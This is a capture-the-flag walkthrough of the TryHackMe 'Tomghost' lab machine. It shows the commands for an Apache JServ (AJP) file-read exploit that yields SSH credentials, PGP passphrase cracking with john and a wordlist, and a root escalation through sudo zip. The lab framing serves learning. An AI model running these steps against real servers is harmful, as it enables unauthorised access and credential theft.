TomGhost Write-Up : TryHackMe Walk-through
--
Tomghost is a Linux machine which is deployed on TryHackMe. It is a defined as a easy level box.
We do not require any special access to solve this box. We just have to register on TryHackMe and continue with it.
Connect via VPN → Join the room → Start the machine.
Here, we are going to explore few new tools and techniques in this walk-through. The IP assigned to me is 10.10.230.122. This might be or might not be same as yours as it is dynamically allocated when machine is started.
Let us first start with the initial reconnaissance.
Initial Reconnaissance
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8
53/tcp open tcpwrapped
8009/tcp open ajp13 Apache Jserv (Protocol v1.3)
8080/tcp open http Apache Tomcat 9.0.30
We can gradually start enumerating port one by one.
Enumeration
http://10.10.230.122:8080
A web application is hosted on port 8009. After enumerating for a good amount of time, we did not got any foot hold.
Initial FootHold
Now enumerating port 8009. The application is using is Apache Jserv.
Let us see if there are any public known exploits available for Apache Jserv (Protocol v1.3).
Cloning this GitHub repository.
Referring this article and trying to exploit the service using the below mentioned command.
python3 ajpShooter.py http://10.10.230.122:8080/ 8009 /WEB-INF/web.xml read
Getting SSH credentials from the exploit, we can easily login.
We can go to the /home/merlin/ page directory and simply capture the flag
cd /home/merlin/
cat user.txt
Privilege Escalation
We can see two files in /home/skyfuck directory.
Here we can see two files with some unique names
credential.pgp
tryhackme.ascBy PGP extension we can assume that it is a PGP File.
What is a PGP File ?
Pretty Good Privacy (PGP) is an encryption system used for both sending encrypted emails and encrypting sensitive files. Since its invention back in 1991, PGP has become the de facto standard for email security.
The popularity of PGP is based on two factors. The first is that the system was originally available as freeware, and so spread rapidly among users who wanted an extra level of security for their email messages. The second is that since PGP uses both symmetric encryption and public-key encryption, it allows users who have never met to send encrypted messages to each other without exchanging private encryption keys.
Here, we can see this is PGP private key. Let us try to decrypt it.
gpg2john ../tryhackme.asc > hash
Contents of the hash after using gpg2john.
john — wordlist=/usr/share/wordlists/rockyou.txt hash
Now for decrypting the credentials.pgp file. we need to enter the following commands.
gpg — import tryhackme.asc
gpg — decrypt credential.pgp
While entering the above command, application request for passphrase which we got after cracking the hash.
Now trying to login as merlin using the password we got after decryption.
su merlin
Now we try escalate the privileges from merlin to root.
sudo -l
/usr/bin/zip can be used to escalate privileges.
By following the below mentioned commands
TF=$(mktemp -u)
sudo zip $TF /etc/hosts -T -TT 'sh #'
sudo rm $TF
ROOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOTED!!!
